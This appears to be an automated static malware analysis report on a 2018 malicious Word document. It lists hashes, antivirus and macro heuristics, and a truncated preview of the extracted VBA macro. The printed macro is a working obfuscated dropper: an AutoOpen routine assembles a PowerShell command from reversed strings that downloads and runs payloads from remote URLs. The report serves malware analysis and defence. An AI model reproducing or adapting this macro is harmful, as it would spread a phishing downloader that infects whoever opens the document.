Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cb7ce3342987424e…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 101.0 KB
Created: 2018-02-07 08:09:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 8f37ae5b1df0db242f93f2834dac55da
SHA-1: a200494f23ad28b42aa0b6e4d58b9c99a90a4910
SHA-256: cb7ce3342987424ea1303adb8172f0172f4bbead7a348263f67bd84630b01059
Risk score: 242

Heuristics (7)

  • ClamAV detection (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The VBA code contains a Shell() call.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen macro, which runs when the document is opened.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This rule catches p-code-only macro documents, or documents where source extraction failed, so that visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface; by itself it is not an attribution to a downloader or to a parser CVE.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body). This is the standard DrawingML schema namespace that Office writes into documents, so its presence is expected.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 24009 bytes
SHA-256: 65e4717db24ffe0ff3b45f444e749045049464adb6f844258311a0470b11d997

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fTMzuncvU"
Sub AutoOpen()
On Error Resume Next
nLvjEMRFY = hdHoSfVOBrIK - IsauLti / (3917045 + tjDNbaAOinwC - 4023448 + SOqBOZpkdcImr)
dSFMqQzjX = EDuOnNVMAnAH - VrTusJFaFpj / (4440474 + YbHmUIudlzULBX - 1715485 + HzqVmkUXW)
HZRKzOLrr = uEOSsNBjuwjql - JwqsBJnGkPNicT / (7396354 + JTKiOMsjzIkA - 4914212 + mRoUAAYSph)
Application.Run "HwkTnBLf", qUUcDXczYFwhC
AnTwFKkiz = pPjDizGJ - tYnhLdwuITlKqi / (5441825 + bttbnYCDNiXk - 7145958 + DuOXwJNGHVJQ)
bOLBzlDVG = NiHUWjT - GLJVQrwTiTT / (4126528 + XRXwnrLjljPj - 9871583 + fQbndmiPwGGw)
End Sub
Function qUUcDXczYFwhC()
On Error Resume Next
JFNfiiupLpK = azTBRuWX - hdMtUVMLUVP / (6272366 + FiwtsuEhQMqjsa - 6306553 + UjNjFMmWb)
ibYPww = jEfOXRdfulD - BbSsRQWMcu / (6054655 + zmBzotvcSMNzBB - 7850936 + DMjvLwhmQM)
XviHf = VzPDmZiOlPjrAp - FpNTqPbwIPN / (6985825 + DEPhbzZcDIba - 3628744 + DKXVjFkrrYwW)
zwZYEQuMkzM = jUBCRrisj + Mid(StrReverse("XtUXqKabAjHbWi+gawyXr'+'KrzkFucsPEcbvKj"), 16, 10)
bmWwXbNlk = DPwBhltXc - mluhfBLNrk / (1132595 + fZwUDlWbW - 1912944 + GcpmpKmDwD)
mRWJk = QVtqJuATIO - lkYFMiHB / (261587 + cMnEpPW - 505743 + jHOKJba)
odCMzORk = bbaDBKzr - NkzDwwC / (3846768 + IGlUfiQEhBXZP - 5701545 + VjaazbCqNkBl)
QXjuztL = uDGoYowLjAw + Mid(StrReverse("fKaWaWLjwaQhtXCnAvZhKRAZwniregaw+gaw'+'tagaw+gawc-sgaw+g'+'awsgaw+gawibBaX+BaXmi//:pt'+'th?/EWlTN/mga'+'w+gawoc.aiiiGUjXh"), 8, 90)
JnCvdDRA = bHwwnwdvUf - GLiPWbWLGPYjds / (2244805 + wqLjuKS - 8940164 + idKiYutEDi)
iodcIsmQORc = SUokUJMECXSEbt - FJwEwsnrswL / (6336119 + VfiaNRkcBaPk - 9629042 + rBLZjlsok)
ziEYBcDT = wiBfdwlI - fiXsrqJJEEi / (6382553 + wiwpjZcvoj - 9020736 + biQFwEoGHS)
rsmHflCOwlb = AkLMqVS + Mid(StrReverse("GKqqGWvJSwvIrRvuuwTshgRzP+RzPa'+'w+gaw4.'+'cfRzP+'+'RzPsaygaw+gawRzP+RzPXrgaw+gaw(gaw+gaw'+'sgaw+gawh4gaw+ga'+'weRzP+RzPlILZIFR'+'zP+RzP'+'gaw+gawdaOILZlnWILZoDRz'+'P+RzPsgaw+g'+'awBaX+BaXh4.gaw+gawUYYyamfjnuUtNMswnfoTdKlIT"), 22, 184)
JVkMQTuwUA = XinQMjjqCcWP - sDFztaMf / (9755066 + hMrCTAwsvzt - 8760242 + LocaacdrmE)
WGKCkpm = jYjkJASFYG - DVdNqFk / (5160787 + SzhuLQAlC - 4147682 + uHVWvQMjuioV)
TJdTIa = EkGwNlXGL - DhqpYsAhCCVL / (9243606 + HSZtAjo - 5786284 + RpaKDXQwiiV)
hNHhWI = TIUiZcokCbi + Mid(StrReverse("dhswTVZClpgaw+gaw.gnigagaw+gawtsgaw+gaw-sgaw'+'+gawda/gawBaX+BaX'+'+gaw'+'/gaRzP+RzPw+gaw:p'+'tgaw+gawth?/CBaX+BaX1Sgaw+gawjT"), 3, 115)
bYiADtkkLI = toFpvMdGfzZCZA - hwKmErcajSNwGI / (7251161 + sLXvlENbEUXDX - 8473782 + fboKzmzNCQOW)
IVTfFw = hNWztFjrBE - ciihjTZC / (8258579 + iXRwnFtzVfX - 6508630 + uqzZJRLudWchP)
WFzLnalm = RiirLfr - qFzGAmtjZpusoq / (7284871 + PlfkEApRYCcTmn - 2365201 + wvAsaDR)
VDrRN = pEbnruwlS + Mid(StrReverse("kllugawtVIC+BaX+BaXgaw+'+'gaBaX+BaXwVgaw+BaX+RzP+RzP'+'B'+'aXgawIgaw+'+'g'+'awCgBaX+BaXaw+gawcgaw+gawegaw+'+'gawjbo'+'-wVIC+V'+'gaw+gawICegaw+'+'gawVIC+VIBaX+'wTHDrbXzAwjjkXAzGFBvfRiDLz"), 27, 155)
RNoVUw = aAGupPihzKZ - lctttqtUMTHjHC / (456517 + CmCbwMmBrAK - 5560744 + WTOcDMKtcWjzU)
dHBfQlk = GtXmnNDfK - wvYqrCsj / (3147059 + qAsHDqrlZQS - 5427724 + zjIUNXPorIG)
mTIJIAfPz = InTBadDirZG - QjwVRFu / (7931167 + RbKjhiIAnz - 8324909 + dvCXjwnPtmYZ)
bPuSboYC = BzznmWPaso + Mid(StrReverse("OiCoWXXrzhhgawIgaw+gBaX+BaXawC(&;)CDSyXr ,gaw+gaw)(gaw+gawshgaw+RzP+RzPgaw4RzP+Rz'+'PgNIgaw+gawLZgaBaX+BaXw+gawiILZrgaw+gawtSga'+'w+gawoNnMRUndC"), 9, 125)
GdosREmtUTd = qMJSszuh - aONmnuz / (6544815 + HZcfCkbd - 9908477 + GRNcVWEqORGn)
fljwo = LiwKtRrjwo - HriLJYrPzMb / (7393965 + msQjEiQA - 3738826 + RwEZhLI)
rnswJrj = JciVirs - pZqnIkvlYBB / (1568303 + NXinmNOEzJE - 8361922 + RJdQOZqX)
EUsHPi = EiauWlOR + Mid(StrReverse("PnNivJovuotbT)'x'+]5[CIlbUP:vne$+]31[ciLbUp:Vne$ ( & |)42qCPZzzzHfbIRj"), 14, 44)
jqSuUQvYiFa = hrdibqQ - wwSmIHncRFUj / (3816357 + qjOlwdur - 7302091 + EZjWvMvDaY)
FszdD = zOOKtthiTbYk - AwPpsmrFMw / (6514770 + YQjFJ
... (truncated)